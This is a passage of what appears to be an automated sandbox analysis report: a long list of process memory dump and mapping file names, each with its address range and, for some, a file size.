                                                                                                                              • memory/4000-126-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                88KB

                                                                                                                              • memory/4000-124-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4016-344-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4020-190-0x00000209AB390000-0x00000209AB400000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                448KB

                                                                                                                              • memory/4020-188-0x00000209AB2D0000-0x00000209AB31B000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                300KB

                                                                                                                              • memory/4044-353-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4104-280-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4196-153-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4224-367-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4236-281-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4268-349-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4300-290-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4300-358-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4308-308-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                48KB

                                                                                                                              • memory/4308-309-0x0000000000402F68-mapping.dmp
                                                                                                                              • memory/4352-272-0x0000000010000000-0x0000000010116000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.1MB

                                                                                                                              • memory/4352-264-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4352-369-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4364-246-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4372-233-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4412-325-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4412-331-0x0000000004CC2000-0x0000000004CC3000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4412-329-0x0000000004CC0000-0x0000000004CC1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4412-337-0x0000000004CC3000-0x0000000004CC4000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4456-283-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4456-312-0x00000000008B0000-0x000000000095E000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                696KB

                                                                                                                              • memory/4468-293-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4488-303-0x0000000008DB0000-0x0000000008DB1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-263-0x0000000007260000-0x0000000007261000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-259-0x0000000006570000-0x0000000006571000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-255-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4488-306-0x0000000009420000-0x0000000009421000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-271-0x0000000007A40000-0x0000000007A41000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-321-0x0000000009FA0000-0x0000000009FA1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-322-0x0000000006573000-0x0000000006574000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-270-0x0000000007240000-0x0000000007241000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-260-0x0000000006470000-0x0000000006471000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-261-0x0000000006BB0000-0x0000000006BB1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-267-0x0000000007430000-0x0000000007431000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-262-0x0000000006572000-0x0000000006573000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-305-0x0000000008B60000-0x0000000008B61000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-304-0x0000000008B10000-0x0000000008B11000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-276-0x0000000007C70000-0x0000000007C71000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-268-0x00000000074A0000-0x00000000074A1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4488-269-0x0000000007530000-0x0000000007531000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                              • memory/4504-159-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4560-237-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4568-355-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4572-368-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4572-282-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4584-297-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4612-154-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4612-158-0x0000000000470000-0x00000000005BA000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.3MB

                                                                                                                              • memory/4612-157-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/4652-366-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4688-351-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4704-160-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4712-242-0x00000000005C0000-0x00000000005D2000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                72KB

                                                                                                                              • memory/4712-241-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/4712-238-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4732-362-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4768-244-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4776-275-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4792-365-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4796-336-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4816-347-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4820-298-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4820-328-0x0000000002DB0000-0x00000000036BB000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                9.0MB

                                                                                                                              • memory/4820-330-0x0000000000400000-0x0000000000D25000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                9.1MB

                                                                                                                              • memory/4884-354-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4912-360-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/4964-247-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5000-251-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                40.0MB

                                                                                                                              • memory/5000-230-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5000-250-0x0000000004920000-0x00000000049B1000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                580KB

                                                                                                                              • memory/5012-307-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5012-234-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5024-359-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5024-163-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5024-184-0x0000000004A47000-0x0000000004B48000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                1.0MB

                                                                                                                              • memory/5024-186-0x0000000003140000-0x000000000319C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                368KB

                                                                                                                              • memory/5028-350-0x0000000000000000-mapping.dmp